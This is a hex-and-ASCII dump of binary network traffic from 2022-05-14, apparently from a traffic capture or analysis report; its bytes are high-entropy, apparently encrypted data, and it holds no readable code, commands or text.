                                                      2022-05-14 13:17:12 UTC442INData Raw: f5 0c 09 f2 34 4d a7 03 f7 23 cc 25 62 28 ee 37 ef de fc cd aa 66 cf 0c 39 15 0c 7c f8 3b b9 44 8d 76 a1 e7 35 c0 3f 3e 5b 52 fa 4f 03 6a 74 b6 54 4d 50 c5 1a 3c cc 0f 72 7f 1f 4a 44 e6 fa a7 6c 98 e6 f7 20 e9 e4 16 86 fb c0 9b 5b eb 32 0b ba b1 68 25 f8 cf 0b 48 53 1a 0c f4 6e 22 92 23 4e e5 5e 16 8b 70 60 9c 93 11 62 63 f3 e3 ef e2 b2 d2 1c fb 9f 28 63 66 4e 53 50 ec d9 8a 8a 5a e0 09 70 04 93 02 fa b1 39 c2 9f 98 a8 8d fd b4 01 46 45 ee b1 1f 7e 95 28 be 4a 2d 50 0c 74 f2 13 e1 45 c0 88 af e9 33 ab f4 50 eb 9f ab 99 b6 d3 13 90 50 ee 76 28 af a5 57 c9 e9 41 d4 91 93 39 58 ea c7 25 49 d0 47 d1 cd 72 36 1a d6 ef db 7d e1 7c 22 ee 3c ae 5b 6d 2a c0 cb 58 4e 66 dc 5e b8 a3 dc 24 ea 07 4e 87 a9 a9 8c 6b 84 41 74 4b 5c 2b 5c cc a5 7d 66 f1 9a 2a 86 db ca ab
                                                      Data Ascii: 4M#%b(7f9|;Dv5?>[ROjtTMP<rJDl [2h%HSn"#N^p`bc(cfNSPZp9FE~(J-PtE3PPv(WA9X%IGr6}|"<[m*XNf^$NkAtK\+\}f*
                                                      2022-05-14 13:17:12 UTC443INData Raw: 0b e1 bf 8b f0 3f 45 47 6f ec 99 14 52 a5 9c 0b 50 82 28 7c f2 a6 6c 38 d4 d2 e6 19 f3 44 84 6d e1 56 90 46 23 f2 4f 62 b8 38 5d 0e 29 23 85 a1 3b d9 a0 31 9e 03 cb cc 35 a8 87 b8 91 6b a1 f2 d3 4c fd 60 d7 83 5e 68 13 1f 6d fa 1b 5d dc 42 78 bb 03 60 6c 6b 7f 2c 13 8b b9 1e ac 2d 5e 82 e1 a6 b4 85 be 26 63 77 60 25 27 02 a3 88 c7 6a ca 7d 61 a9 ed 90 1a c5 ee 9a 2f c0 f7 ed 1f a0 bd c3 59 7c 9f 85 75 b7 40 7c 44 d5 f5 fd 61 c5 a4 15 4f dd 54 52 0d 15 b5 24 74 e2 20 7a 90 51 2c 62 68 f7 17 42 c8 16 ad 2a e4 40 2b dd d6 1a b4 76 a5 87 ad c0 b7 a3 f2 fc b6 70 60 09 f5 5b f7 d3 a7 5b 7c 56 b0 43 6c 8d f0 fa 84 0e bf ff 33 7c 68 28 64 3b ed d5 59 07 38 6b dc af d7 4f 90 ef 1e a3 dc 4c 39 19 21 69 5d b0 73 c0 27 7c 4e 28 7b dd 0e e7 2f 1d 6d ff 65 b9 26 b1 c4
                                                      Data Ascii: ?EGoRP(|l8DmVF#Ob8])#;15kL`^hm]Bx`lk,-^&cw`%'j}a/Y|u@|DaOTR$t zQ,bhB*@+vp`[[|VCl3|h(d;Y8kOL9!i]s'|N({/me&
                                                      2022-05-14 13:17:12 UTC444INData Raw: 71 04 d9 5a c5 b8 92 4c 9d 1f da bb 1b 8b 3d 79 6b 36 1d b5 87 b3 14 78 67 29 27 d7 d2 4e 52 fd d6 a2 66 2b 06 05 1f 72 30 8d b5 80 0a d7 84 50 47 14 d9 67 6f 79 4f cb bb 60 d3 8a 53 44 fe ac 27 6d 68 bd 79 8a 84 8d b3 30 a6 da 35 de 21 d5 85 43 90 35 8d 00 22 91 37 01 9c f2 4f 0d 14 f3 17 fd 23 7d 82 fc 20 ec d8 6e 84 cd 45 33 36 32 86 28 5a 7c 32 0a b8 67 8d b0 87 8d bb c9 47 77 ee 8e af 9a 39 02 2c dd 45 cc 70 69 9f 5c cb 94 c4 35 0e 71 a0 41 f6 f3 c8 ec 83 ec 37 13 4a 90 3d b4 41 36 d9 e2 36 ac c1 1e d1 5e c6 0f 2b 78 e6 d3 58 56 9e 5e 40 cb 4c c8 6e c2 36 95 b0 fe bd b5 f1 eb 57 dc 96 d2 f6 11 2b 31 7d b1 00 04 80 31 fb 4f a3 e3 c8 3c 37 79 0d ef 75 8c 9c d0 8e 9f 8e 14 24 4c 20 5b 15 7c ca b4 ef fd ef e1 21 d6 3e c2 b9 c6 33 3b 22 8e 4a d0 3a a4 f8
                                                      Data Ascii: qZL=yk6xg)'NRf+r0PGgoyO`SD'mhy05!C5"7O#} nE362(Z|2gGw9,Epi\5qA7J=A66^+xXV^@Ln6W+1}1O<7yu$L [|!>3;"J:
                                                      2022-05-14 13:17:12 UTC445INData Raw: 35 b0 71 c8 40 7b b4 d4 a3 61 83 a3 89 a6 ee a3 6f a7 8f d9 88 76 00 49 01 6b 59 9c e9 22 dd bb 58 59 3f f4 36 4d cd f9 6e 9a 84 01 b0 36 f7 1b 92 29 f5 23 50 6f a9 aa c5 a2 c4 b2 1e 59 06 57 10 ee f8 d2 ef 36 0f 3f 32 1c 56 63 bb a3 e7 9f bd 34 60 69 0e 50 ca ed d7 88 4b 2f 09 04 93 28 eb 91 26 c8 d8 c5 e1 a8 41 fc 8d 6a 0a ae ec 36 6e ee 96 00 f6 86 13 a7 c6 d6 91 ed af ab 4a ce db 0d 23 40 f8 31 b9 4d 8f a4 85 dd 6e 99 61 17 d5 17 3e 29 50 3d de 8d ea e5 c7 ca 6c 76 52 55 c0 ca f7 a5 55 4f 2e 48 71 5c 33 34 9f 26 95 6f c3 73 9f b6 62 65 5e a4 cd 4a 26 5b 46 34 8a 5d 8b e8 c9 78 37 06 e7 66 c2 68 22 3e 40 b4 d5 74 66 d3 ee e1 6a df f0 43 0e 51 af cb 0b f0 80 7c 59 5d 24 c4 e0 25 fb 83 93 10 2e 45 9c f8 7f ac 7e 81 ae 6c 14 68 4a a9 39 0f b9 92 c6 11 17
                                                      Data Ascii: 5q@{aovIkY"XY?6Mn6)#PoYW6?2Vc4`iPK/(&Aj6nJ#@1Mna>)P=lvRUUO.Hq\34&osbe^J&[F4]x7fh">@tfjCQ|Y]$%.E~lhJ9
                                                      2022-05-14 13:17:12 UTC447INData Raw: a3 c1 48 b9 4d 4c 53 eb b4 bf 59 cf 84 e0 5c 86 53 cb 96 45 75 a8 82 79 e2 de 67 6a 77 40 80 08 58 ad 57 3c cf d6 41 f0 c5 c5 58 74 0c b4 16 6f 8a fd 16 4b c8 0b f1 51 27 ef cd d7 05 44 b4 c8 d2 eb 43 00 92 da ec 54 2e ad 2e 63 0c fe f3 77 14 4d 7c f9 f1 59 20 b9 82 82 05 a4 d8 3c 04 ee 8d 1b 3b bd af 15 5f 84 ab c5 23 1f bc 81 10 7f ef 4b 6a 11 96 d9 46 4e 81 eb 6d 16 c5 a0 5c 70 d8 0b 7c e4 f0 93 0c 26 f3 7c ce 7a b3 d0 97 7a dc b4 8d 8a 96 06 1f ce e6 2e b0 36 b8 10 68 93 2e d1 6b 15 9e 8c 4c 47 02 bc 4e c9 99 d2 b6 ca d4 7c 20 5c e4 2d 38 e1 85 e5 c8 5b c9 43 fb d1 03 7e e8 04 a7 1d 2e 87 48 cc de 60 86 43 37 ef ad aa fd b4 4d 63 8a 29 7a 17 a9 ac 04 6f 54 2c 71 44 a6 95 28 75 6b bd 7b 02 ef 9b b3 07 18 94 04 b7 05 5c 10 38 30 c0 6b 6e 34 ad 5d e4 f4
                                                      Data Ascii: HMLSY\SEuygjw@XW<AXtoKQ'DCT..cwM|Y <;_#KjFNm\p|&|zz.6h.kLGN| \-8[C~.H`C7Mc)zoT,qD(uk{\80kn4]
                                                      2022-05-14 13:17:12 UTC448INData Raw: 37 2a f9 2f bb 82 3a ae d5 c1 5e fa 4a f6 f5 a8 ac bd bd 10 07 b7 74 db 7a 39 98 0d 50 2d bd ae f0 27 81 8c 74 a9 4f cf 75 cd e6 0d e3 84 30 e4 ef e0 ac b0 0f 14 b9 dc 0f 16 f4 f7 9f 92 b7 39 90 0a 7c cd 31 5c ea a6 a3 3b 2d 52 41 a5 68 45 0f 5c 53 79 80 64 ab ab b7 01 db 90 77 e2 08 96 4f 20 bc bb 0a fe 3c ad ca b1 58 4a 4a 11 56 2a ff 3b d3 3f f8 e2 d5 49 51 f8 87 3c 56 58 00 05 9e 71 56 bf 4c c9 4f c2 16 b9 6f 4c f1 06 27 f9 32 56 b5 09 b4 33 bb 29 d4 60 55 18 aa cb 83 fe 35 b3 dc f3 70 d2 88 82 82 db 3e 95 67 a6 72 d3 ad f0 f0 9b 54 2c 01 fa 2d b7 ef 45 c8 b8 f9 5f a9 44 e5 97 7e 09 88 3a 06 2d fb 44 d1 05 14 a3 bb 12 02 11 14 e0 e0 05 1b 2e a0 fd 1f 4b 67 08 a5 a1 8d 32 7e d0 88 97 2d 83 34 87 94 85 cf 23 2d ef f0 91 0e 89 cd 49 c9 12 63 54 94 03 ab
                                                      Data Ascii: 7*/:^Jtz9P-'tOu09|1\;-RAhE\SydwO <XJJV*;?IQ<VXqVLOoL'2V3)`U5p>grT,-E_D~:-D.Kg2~-4#-IcT
                                                      2022-05-14 13:17:12 UTC449INData Raw: 1b 2b a9 03 c4 83 d8 5f 55 52 92 8f 3e 33 27 25 dc 86 5a a8 53 7f ff 9e 92 55 d0 8d ef f2 01 c6 89 0e 3a 4a fb 08 62 03 f7 88 1b 23 dc 82 44 fe 1c 26 1f 39 db 2f b8 5b 3e 61 54 e4 e5 6f ae 31 f1 b7 79 ad 31 aa b3 73 d3 48 b4 1b 57 1f c0 1d 04 27 67 06 2e a8 e3 6b 02 71 21 24 34 b8 4f 43 ba 55 67 ad fc 1f f5 69 14 e6 9a 95 49 bc 38 d9 7b fb 55 f5 d4 2f d0 2c 14 71 e0 68 77 0d 8b 30 c5 c3 e0 43 da 93 73 bb aa e2 af 8c 2f 43 30 dc 6f 9e 7d 6e 1e 4b de b8 d1 95 11 93 65 06 e5 76 45 b7 68 a2 bc f4 20 85 8a 47 31 89 ac cf d1 ec 7d 0c f8 4d a4 5d 34 22 f3 a8 c4 5b 40 b1 42 e0 df 7f f8 30 84 b7 db 43 5c 9c dd 40 e3 23 e4 b6 67 82 4f 59 d2 26 40 fa 65 a5 2a 04 4f 7b bc 2c ed 28 24 be c9 8d 34 f0 13 38 7d b7 e3 d0 34 ac f8 e8 c5 5d 7e 52 b0 40 69 f9 b6 51 e9 33 eb
                                                      Data Ascii: +_UR>3'%ZSU:Jb#D&9/[>aTo1y1sHW'g.kq!$4OCUgiI8{U/,qhw0Cs/C0o}nKevEh G1}M]4"[@B0C\@#gOY&@e*O{,($48}4]~R@iQ3
                                                      2022-05-14 13:17:12 UTC451INData Raw: 6c 00 64 8b 1a 6d a0 fe f2 cf 47 95 69 24 5f d2 a9 31 1d a0 80 98 05 50 fd de a0 b5 a5 5a 5b c6 ef b2 f1 f4 20 8a 7f fc 63 51 32 2d cb a1 d9 8d 0d 9f 57 a9 2b 48 e6 13 ba 0d 9d fa 0d 12 c3 29 0b 9b 6d 10 0e e8 6b 2c 68 f0 22 b6 44 57 f2 72 de 9f 64 ec 9c 24 d2 7d 2c b3 61 26 ec ee 4e 00 e6 c0 ee f0 f9 dc 1c 47 06 af 41 08 49 57 00 a4 46 5b 14 09 70 d3 08 1f 25 89 50 01 f9 8f 2b 3a 3d 6c 8a 42 54 79 65 07 d1 1f 1c 1f 0b 0a 09 b7 bf 51 e3 de e0 20 09 97 0b d8 3d 62 6e 18 1f ab 38 2f e9 3c 5f 3c 0d bb 53 68 1b 47 da ea 65 18 74 ea a4 6b 5e 26 2d d7 de b7 9f 9e 46 f2 7f 71 3d f2 dc 06 18 00 cb 1c d0 9d e9 cd 27 71 7d df a1 36 40 46 0a ed 48 bd 6b f0 ac e1 36 a4 97 48 f7 5b aa 45 69 ee 37 00 c4 32 f0 14 b7 bd c7 ff 92 c3 e3 66 9f 43 32 35 38 5a 69 71 87 68 ec
                                                      Data Ascii: ldmGi$_1PZ[ cQ2-W+H)mk,h"DWrd$},a&NGAIWF[p%P+:=lBTyeQ =bn8/<_<ShGetk^&-Fq='q}6@FHk6H[Ei72fC258Ziqh
                                                      2022-05-14 13:17:12 UTC452INData Raw: e6 47 ce 15 af 5e c1 71 26 51 77 10 76 fb 37 dc b8 07 6d 3b 60 6d d8 ca 82 f2 ce 6b 85 98 28 c2 a1 50 22 2e 77 34 e4 56 be b4 b9 5b d7 0d 63 93 6c 80 6c 64 d3 85 11 9b b6 1b 4b 23 d3 39 a6 4f 93 66 d7 32 bc 6b 7c 55 c2 f7 56 a1 43 38 ce 2c 52 f3 4f d1 bc 41 80 3d 04 90 bb 72 37 85 fa 31 34 5d 13 b7 17 5c e7 6c 30 0a 76 64 29 6b d6 e9 21 f9 63 70 8a c2 fb ea 9b 9b 29 9d fd 41 6b bd c8 40 95 a1 1e 78 b1 f8 30 a3 95 de 3f da d5 cf a1 4d 3e a5 e3 3e 95 7c 93 b5 d9 47 85 e9 49 67 8e e5 c5 a8 fd 7c 36 0e 7b 40 eb 0b c8 5b 63 c8 10 f2 59 75 56 e8 f6 2f ba 02 23 9e 23 2f a2 e1 91 95 50 ad 9c 0f 42 35 63 de 16 21 ba 08 31 9a e2 1b 9b f6 be 87 42 66 a1 15 0f c0 91 c9 9b 11 c3 8c 57 09 e3 cf 33 5f ea f6 d8 0f aa b8 37 26 18 84 e9 e7 68 ba de be f6 cc ad c4 e5 01 b4
                                                      Data Ascii: G^q&Qwv7m;`mk(P".w4V[clldK#9Of2k|UVC8,ROA=r714]\l0vd)k!cp)Ak@x0?M>>|GIg|6{@[cYuV/##/PB5c!1BfW3_7&h
                                                      2022-05-14 13:17:12 UTC453INData Raw: 91 77 a6 d6 89 a2 f0 74 8c f6 f4 70 49 19 73 a1 71 46 a1 da 18 86 dd d1 48 93 11 63 cc 30 f6 8e b1 6b 45 19 7e 52 4b 38 69 22 70 0b df c2 54 35 b2 9a 3a 95 c4 00 2e f0 68 f1 b8 e7 db a3 e6 b8 66 d1 f0 bb 8c 95 4e 13 04 25 36 da 2d 56 18 f3 f7 39 82 83 28 c1 ab 8b d6 cd 8c 62 4a 2f e7 b2 22 e5 77 be a9 d9 c7 23 05 37 70 9b 45 51 b6 03 88 7f 10 cf 22 cd 38 e3 db e0 ce 7d 52 99 4e 09 77 0c bd 96 68 bf 8e 97 9c c1 37 63 2c 41 89 62 bf d0 2d 04 76 15 22 ad 1e e7 f8 74 c3 9d 59 81 5f fc da e2 be 80 b5 6e 1a d7 1c a4 d7 26 91 bf 4a 88 2b e3 e2 45 cd f6 f1 b3 9d 27 df c7 b2 d8 16 f0 be be 78 d5 a1 17 a5 17 d5 1a a6 12 26 e4 a9 9a a7 b0 3f 1d 4c 7f 72 d2 87 fb 4b 20 3d 70 f9 2a 96 38 f3 f0 6e 49 08 88 23 ae 52 82 53 50 c5 26 7b 86 71 b2 47 e9 82 3e 67 59 dd 49 dc
                                                      Data Ascii: wtpIsqFHc0kE~RK8i"pT5:.hfN%6-V9(bJ/"w#7pEQ"8}RNwh7c,Ab-v"tY_n&J+E'x&?LrK =p*8nI#RSP&{qG>gYI
                                                      2022-05-14 13:17:12 UTC455INData Raw: df ad 59 cd e7 aa b7 13 0b a7 84 53 52 46 3c 66 16 0a 3e 28 df 1d 6a 90 12 4b 95 42 66 cc 70 76 3c 52 06 0b 9b 30 c6 1c b5 e4 6c cc 66 d2 d9 c1 b9 0c 15 dc 60 5f 7a bc f2 39 9a 04 d0 41 58 64 b4 c4 37 c9 6e d2 e2 4b 24 5e e8 75 ab a9 70 2f 31 22 1b 9e af 1d 24 01 7d 28 3a b8 c1 bb c9 ed 6d 61 28 93 2b b3 65 26 42 9c e1 db cc a9 d5 76 eb f1 3b 77 f4 b0 8d cf ad 84 3f 30 31 f1 bc af c7 65 9d f5 ab a2 3d f5 d2 2d e9 7a d6 37 9f 0f 1b 32 39 6d fd 30 27 18 9e 72 da 0b 2e e0 a6 25 ff 70 8b 9c a9 17 8e 2c 6a 8d 05 31 b0 0c 45 40 b3 a9 5c f1 91 43 82 35 8c 7c 32 be 09 d0 14 df e7 eb 26 9a 91 e0 a4 34 f3 71 ba 8e a8 ad 1c b8 97 85 eb ec 9b 30 2b 04 11 87 4b 01 86 98 a8 bf 1e ea 02 e5 c9 21 ae c3 29 bb d2 82 6e 0f 8e 91 2b 04 7a a3 99 d2 62 76 86 db b4 ad b1 b1 56
                                                      Data Ascii: YSRF<f>(jKBfpv<R0lf`_z9AXd7nK$^up/1"$}(:ma(+e&Bv;w?01e=-z729m0'r.%p,j1E@\C5|2&4q0+K!)n+zbvV
                                                      2022-05-14 13:17:12 UTC456INData Raw: f4 03 5f 1c 06 11 f0 23 cb 15 d8 1c 66 18 b0 9b eb f9 df 6d 21 96 2f 82 1a a1 a1 91 1e 28 eb 82 5c 7e 25 be 9c 7b 4d 4f 0c 3b e2 ac 94 0d ff 84 4e bc b5 d0 b1 16 56 0e 80 eb 42 45 43 91 23 ef fd 00 11 2f 6b 16 a3 24 61 7d d6 b8 d4 1c ab 93 b3 a3 aa 10 4e 4b b9 2c 9e 88 f3 ef 9c a8 9b 67 1d 28 20 d0 ed 2f 43 d4 99 c8 69 40 50 e0 c5 97 a5 d8 7d 35 b6 9c 0d 9e 4a bd 73 04 e6 b7 53 25 f1 c3 00 bb cc bb 00 5e 30 2d 8e 34 ad a6 c4 e3 7c 4d 97 48 32 7a 9d 87 35 c3 df a6 33 98 bb 46 d8 0d a2 22 0a b2 e8 c8 b2 37 ed 84 3b a1 71 2b 2c 73 17 73 0d 57 cd a5 f1 c9 22 38 3d f0 df a3 82 29 fb c6 81 3a cb 05 06 15 b0 72 20 25 d0 74 dc 83 6b 47 61 7a 63 03 fb 15 f1 df 89 6a 17 9a 33 78 d3 f6 19 1b bc 11 90 ce ad ae fb 61 39 25 e1 32 bf 06 0b b9 ab f3 7a 6f d5 b3 4e 3d b4
                                                      Data Ascii: _#fm!/(\~%{MO;NVBEC#/k$a}NK,g( /Ci@P}5JsS%^0-4|MH2z53F"7;q+,ssW"8=):r %tkGazcj3xa9%2zoN=
                                                      2022-05-14 13:17:12 UTC457INData Raw: 9f 4d d4 d6 f5 f7 ff 85 92 bd 8d b9 3e 42 9a 1e 1d 16 30 98 9a ce 87 b2 21 4b 60 24 28 31 b0 32 0b ac ec 6a d1 4f 9f ca 04 24 b1 79 65 57 d5 3a f9 1a 1d cd ca 4f 6b 8b 71 64 fa e5 cd 7d 4d a7 66 e7 ab ce 63 16 63 2d 08 83 56 63 eb 76 91 ae e5 d9 9c 63 8e 37 65 72 c8 3b ea a7 fe 8a 77 9b 1a 64 45 e3 38 2e 48 72 92 61 a5 32 b4 36 da c6 ae 51 00 3d 7a 51 aa d8 75 7f 14 02 c0 75 ae 44 8a 74 1a 89 ed 46 03 17 22 81 5e f5 30 b8 ed 8c 82 f5 9d a7 69 9d c6 a5 85 80 90 28 e8 8b 36 5c 0a 61 77 45 78 1c 79 39 e3 a6 29 28 ed 6b f3 56 0c d0 3f 1c 82 36 90 55 29 12 dc 02 97 b7 db 59 c0 62 67 c3 1d 8f d4 f1 b8 8a 00 fb 15 19 e5 ee c5 48 93 67 74 52 71 93 18 54 c9 92 75 70 63 10 43 d8 b1 4b 27 2f ad ff 86 34 5f a3 3e d7 a5 15 a9 fe 16 15 fc 21 0d ac d0 f0 a9 37 54 e0 49
                                                      Data Ascii: M>B0!K`$(12jO$yeW:Okqd}Mfcc-Vcvc7er;wdE8.Hra26Q=zQuuDtF"^0i(6\awExy9)(kV?6U)YbgHgtRqTupcCK'/4_>!7TI
                                                      2022-05-14 13:17:12 UTC459INData Raw: 51 fd b8 88 b5 18 50 eb 5c ef ef 3d 36 f8 0b 49 ac 31 c7 ff ff 8f 7f 31 6a 11 bb 05 24 78 54 e7 72 ff 56 e5 df de 03 03 16 0f 24 a4 8a 0e 06 e0 24 97 63 c5 75 0c 6d fe 9f dd 25 ef 11 c1 be 11 4a 73 dd 67 1d e5 fd 5a 9f 1a 64 c3 22 36 65 bf 79 6a 7d a3 fb 07 37 85 2c e1 d2 50 de 31 61 79 e0 04 0c 8d aa 35 25 aa d3 fb 84 50 fc e0 2e 07 95 69 85 ca 01 e0 b3 a2 b1 8f 86 de a8 9e de 1c af 40 97 8e ac c8 23 32 2b a2 2a b5 57 b5 10 63 01 5b bd c8 44 32 93 eb f0 55 a0 71 c1 9c 2c 28 8f 85 f6 48 5e a2 99 bc 9b 47 ab ae ab 0f 45 36 08 de 67 3c 75 fc ce ef 31 17 5a 0b 4a 8b 6d 68 ed 20 2b 6c fe db ab d6 08 a0 4b 30 23 30 28 4a 59 e5 e1 35 ad d3 2b 06 de 44 af f0 3a a6 f2 9f 85 24 fc 08 38 aa 93 fc f1 9c bd 57 68 a4 c1 5b 9f 40 06 e3 68 bb 8f bc b9 2c f8 da 53 98 5a
                                                      Data Ascii: QP\=6I11j$xTrV$$cum%JsgZd"6eyj}7,P1ay5%P.i@#2+*Wc[D2Uq,(H^GE6g<u1ZJmh +lK0#0(JY5+D:$8Wh[@h,SZ
                                                      2022-05-14 13:17:12 UTC460INData Raw: db 85 5b 9e c7 dc 85 a4 58 9e a9 f7 e4 ce 21 d3 20 94 31 f8 42 fc 42 69 62 91 65 77 46 c8 3b d8 2c b9 6a fe 26 82 9b 86 06 ce f2 ca 09 2e be f8 0a 53 1e 51 4e 2b 37 81 ed 3b d8 19 d4 86 9b 4c ef d6 24 9c 9d b3 f3 15 42 8a 25 aa 64 7e 3e ec c6 5f 3f d0 73 3c 45 f0 df 42 8e 71 0a ed 6f ef bb 17 6a a1 89 be 57 83 a1 20 17 d5 47 fb c1 68 11 31 18 04 be 03 f8 a3 db 66 86 36 0c df 4a bd de 32 d6 91 bc 47 aa eb f7 6e 65 2b 82 87 ae b3 52 da ce 96 46 27 5e d8 91 4e 9e a1 fa f0 8f 30 d5 85 ce 0c bc 0c 3d 7a c8 34 89 0c a0 25 54 f7 85 bc b9 60 03 4b 59 8d 81 62 ac f5 15 d3 22 7d ef f0 e4 29 b2 09 97 7b ea 28 19 93 d5 18 3e f7 fd cb 3e 3c 57 94 cf 5e ca 3b 91 bb fb b4 af 16 1a 80 0a f5 68 08 68 c2 51 dc 7f c0 99 f9 dd 7a 30 78 41 62 17 eb f0 4b 99 19 51 5c 6c ce 3e
                                                      Data Ascii: [X! 1BBibewF;,j&.SQN+7;L$B%d~>_?s<EBqojW Gh1f6J2Gne+RF'^N0=z4%T`KYb"}){(>><W^;hhQz0xAbKQ\l>
                                                      2022-05-14 13:17:12 UTC461INData Raw: 6e ae a8 8f 11 b9 1f 31 a4 85 a6 97 9f a8 df b7 00 8f e7 c5 0a af 92 24 1a 0b 02 46 56 8e dc 7f 9f 22 60 6a 58 81 db 84 a0 b4 90 af 57 de c5 ee d1 ed 57 cc 5f c5 c1 86 31 a2 3e a7 4c 58 3f 14 34 43 81 57 e5 25 c1 1f 1b 83 38 8e 3b 40 ed 6b e6 29 65 b9 6d 50 9a 4b 96 fc 29 74 e2 37 f1 c3 fc 3b 84 60 f1 e5 0d e5 8e 0c 15 4e 8c b6 65 32 e0 34 46 b9 6b 9f 42 89 49 f8 36 a8 92 92 ee b2 25 94 c8 29 90 6c 82 58 60 eb 6f a4 dd 18 92 dc 4e 9e 47 5c 65 f8 71 d5 6d 44 1c 71 b5 1e 6e ce 99 e2 af 83 c0 1c 4f 7a 17 5a 59 1e 3f e9 ae 42 7c 15 86 e9 7c 19 86 89 02 ca dc ec 65 31 9e 64 93 21 7c ac 9f 05 c6 08 8a 40 26 be 1b ba cc 2d d2 84 b9 d9 6b 21 ef f1 b8 3f 25 36 94 a3 c5 e6 e9 b0 8c 06 8c cd 63 d1 a3 6f 49 39 91 d0 53 d6 e7 1a df f7 f2 51 90 c8 c5 7b 80 1f 32 e1 61
                                                      Data Ascii: n1$FV"`jXWW_1>LX?4CW%8;@k)emPK)t7;`Ne24FkBI6%)lX`oNG\eqmDqnOzZY?B||e1d!|@&-k!?%6coI9SQ{2a
                                                      2022-05-14 13:17:12 UTC463INData Raw: 9e e1 85 3d 09 d3 4c 72 e0 30 8b e6 d7 4b d6 5f aa 54 4b 4f 94 ca 59 97 f4 55 ec 2d 03 37 62 a4 e9 d0 c6 ac 4d 7e 70 1d 50 fd 60 a0 0b a7 5e 42 50 0b 9b 02 5a 07 33 77 8a d3 f6 62 c4 bf 71 3a 06 10 8a a4 6b b9 84 35 61 65 f1 91 f5 31 4a 61 9e a5 10 a3 4e 28 83 9e f1 8f ce df 5c c2 1c a4 e5 ef 11 fd 2c 4e 81 e2 8d 11 fe 6a e2 f4 34 b6 16 a3 11 a8 a0 56 56 fd 1c d5 1f 6c 82 bf e1 e8 e8 d6 71 a3 5c 8f 14 27 e4 39 00 c7 d1 b9 b1 2b 75 24 5f c1 01 cd e6 55 4e 73 0d b3 97 ca 5f af 3f b0 e6 a0 fe 23 ee cf 19 9c a9 4a 0d 06 a4 72 fa d6 78 46 7e 69 02 5a 12 7f fa 05 2f 5c 3c 5d 44 28 6d cf 4e 1c 17 ea 98 81 5b b4 13 fc 2c 25 a2 bd 13 78 4a 80 4a 34 f8 ba 87 a6 69 eb 5f 24 90 bb bd b1 bd 5a aa 23 66 29 4c 80 d6 53 ff 15 85 57 8d fa 22 31 87 65 fe 15 63 e0 0a 11 07
                                                      Data Ascii: =Lr0K_TKOYU-7bM~pP`^BPZ3wbq:k5ae1JaN(\,Nj4VVlq\'9+u$_UNs_?#JrxF~iZ/\<]D(mN[,%xJJ4i_$Z#f)LSW"1ec
                                                      2022-05-14 13:17:12 UTC464INData Raw: 93 78 90 e8 a8 73 b2 0a 05 6a c2 49 3a 3c d7 4b 58 92 8e 75 59 b4 fd 0f 3a 78 a7 18 61 e8 49 de 22 12 f9 99 93 d1 9f 1f 67 b6 44 22 ea e4 08 35 db 45 b3 34 34 3a dd f9 df 8e 37 79 25 d1 e5 bf c6 f0 81 eb 2e 6f 1f 9e 34 ab 7f 5e 15 ed ca e1 9b f2 40 b6 80 86 15 67 2d 7f 3a 3d e6 5a e9 e2 50 07 c4 2e 2d fa ee 8d f7 1e ef 05 e0 96 67 d9 70 48 a7 7b fe 3a 39 32 b4 34 9d 0f 96 d5 d0 20 d1 76 eb 90 74 4c 2b 87 9b 05 30 da 72 80 e8 2c 67 cc e4 27 00 fd c9 66 53 05 37 81 2b e8 1f bd 03 fa 77 17 6f 02 9c 76 df 8d 4a f1 35 12 8e 09 3d 55 ba bc ae a5 8d e5 00 18 24 dc d4 fe 50 69 57 0f b1 5e fe 14 9b 53 57 06 0f da 61 eb 51 e7 57 a3 03 9c 86 28 7a 8d c1 b5 4d 3d ca 05 d3 69 f1 13 97 17 e2 ae f2 94 78 57 95 f4 93 e8 18 0e 56 15 c5 3a 18 03 21 17 31 00 c1 45 66 5f fa
                                                      Data Ascii: xsjI:<KXuY:xaI"gD"5E44:7y%.o4^@g-:=ZP.-gpH{:924 vtL+0r,g'fS7+wovJ5=U$PiW^SWaQW(zM=ixWV:!1Ef_
                                                      2022-05-14 13:17:12 UTC465INData Raw: 2c 2e 58 8f 14 8f 84 ef 4d bf 5b 5f 48 56 aa 32 9b aa 4c 31 05 5d a3 c3 3f 5b ca da 97 fa 07 b1 2d 4f b4 8e f3 bb 30 2e 75 77 be c2 b2 62 93 19 69 0b 08 2f 78 45 74 e0 d9 46 fc d7 19 8b 18 63 cc 1f cb 36 ad 35 ab 59 1b fa f2 e4 23 af 27 e6 05 25 ae ca 2d 4f 7c 33 77 0b 6c 1f 39 16 1b a9 ab 70 00 63 92 d1 a3 d5 f0 39 5e e6 0c 34 14 07 c8 0f 8b 44 79 3f 6f b7 d4 eb 1a 31 ae fb 0e 35 32 62 b4 4a cd 0b cf 25 65 07 81 7b b9 3b 39 fc fe 1e 72 e0 c7 1a 44 bf ed 59 56 e6 e5 08 49 21 f2 7b 96 b6 90 8a 68 d0 c5 8f 52 8c cd 7a 30 48 80 59 1b d5 b1 7e 24 dc e3 79 6b e8 d6 1f 5c d8 2f a3 5b 10 86 62 04 da 9b b1 6c c5 76 85 b6 a7 9b 7d 03 c2 d9 05 d1 2c 8f b9 61 f1 71 d4 17 e5 01 0d 4d 0a e4 a7 62 a2 76 99 d9 0c 0e 01 7c b5 c1 34 6f e8 dd 61 63 0d 08 5d 98 3a 2e 26 20
                                                      Data Ascii: ,.XM[_HV2L1]?[-O0.uwbi/xEtFc65Y#'%-O|3wl9pc9^4Dy?o152bJ%e{;9rDYVI!{hRz0HY~$yk\/[blv},aqMbv|4oac]:.&
                                                      2022-05-14 13:17:12 UTC467INData Raw: a7 c7 31 2b 04 5f 72 5d 70 98 df d9 e5 17 04 33 7c 45 e6 ba 61 f1 7f eb 37 6a a0 79 f2 83 79 84 23 a5 5d 56 04 29 3a 0e 6f 15 4b 1b c1 40 fb b7 98 77 8d 61 d8 4f 7f 40 d1 f1 3c bd ef ee 8d 3b 4c a7 dd bb a5 46 c0 3e ee a3 c9 65 57 d9 67 21 06 14 55 e9 6b fb a9 6c b8 da 3e 0f 0f 51 e7 a6 4f 54 05 29 ad fc d1 41 b0 c2 fc a9 fa 5c 19 49 3b 4d cb b6 53 a5 f4 4d c1 a3 eb a8 72 3a 0c 67 28 31 b0 92 16 4c b8 35 bf 35 7a 1b 11 22 5b da 59 a4 7a 48 bc 89 8e c4 86 09 49 72 62 3a c8 ce 6f bf 1c d4 98 b7 fc 4d 1d 4e 35 15 10 a3 14 4c f7 1e 07 ce f6 1a 8e ef 93 94 87 b6 d0 80 f9 56 a5 23 3d 7e 6d 5f da 98 cd c4 d1 91 ed 6a 30 34 b6 c5 58 f2 bd f0 b4 97 7e d6 fb 19 2c c9 b8 3d c7 b2 cc b4 72 ba e1 f6 e2 41 ae d4 